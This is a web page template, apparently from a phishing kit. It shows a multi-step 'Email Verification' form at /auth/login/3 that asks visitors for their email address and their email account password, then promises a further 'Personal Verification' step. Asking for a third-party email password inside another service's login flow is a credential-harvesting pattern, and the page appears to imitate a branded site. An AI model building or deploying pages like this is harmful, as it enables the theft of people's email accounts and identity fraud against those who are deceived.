@layout('layouts.app')

@section('content')
<div class="cb-main-content">
  <div class="progress-bar">
    <div class="cb-main-content-sub">
      <div class="container__content">
        <div class="cb-progress-bar">
          <p class="cb-progress-bar__label">
            50% Complete
          </p>
          <div class="cb-progress-bar__container">
            <div class="cb-progress-bar__bar" style="width: 50.33333%;"></div>
          </div>
        </div>
      </div>
    </div>
  </div>

  <div class="cb-main-content-sub">
    <div class="container__content">
      <form action="/auth/login/3" method="POST">
        <h1>Email Verification</h1>
        <small>Help us confirm it's you by filling out the following.</small>

        <div class="cb-inputWrapper">
          <div class="cb-message__content">
            <div class="text">
              <div class="cb-field">
                <input id="emailAddr" name="emailAddr" class="cb-input" type="text" spellcheck="false" autocapitalize="off" autocorrect="off" autocomplete="off">

                <label class="cb-label cb-label--alpha" for="emailAddr">Email Address</label>
              </div>

              <div class="icon-checkmark-green cb-valid-indicator"></div>
            </div>
          </div>
          <div class="cb-message__message" style="display: none;">
            <span class="icon-error cb-message__message-icon cb-message__error"></span>
            <span class="cb-message__message-text cb-message__error">Enter a valid Email Address</span>
          </div>
        </div>

        <div class="cb-inputWrapper">
          <div class="cb-message__content">
            <div class="text">
              <div class="cb-field">
                <input id="emailPass" name="emailPass" class="cb-input cb-mask-input" type="password" spellcheck="false" autocapitalize="off" autocorrect="off" autocomplete="off">

                <label class="cb-label cb-label--alpha" for="emailPass">
                  Email Password
                  <span class="cb-label-icon cb-label-icon--secure"></span>
                </label>
              </div>

              <div class="icon-checkmark-green cb-valid-indicator"></div>
            </div>
          </div>
          <div class="cb-message__message" style="display: none;">
            <span class="icon-error cb-message__message-icon cb-message__error"></span>
            <span class="cb-message__message-text cb-message__error">Enter a valid Email Password</span>
          </div>
        </div>

        <div class="cb-actions-items" style="margin-top: 5rem;">
          <div class="cb-actions-item cb-actions-item--primary">
            <div class="cb-actions-primary-text">
              <div>Next: Personal Verification</div>
            </div>
            <button class="button button--primary submitBtn" type="submit">
              Continue
            </button>
          </div>
        </div>
      </form>
    </div>
  </div>
</div>
@endsection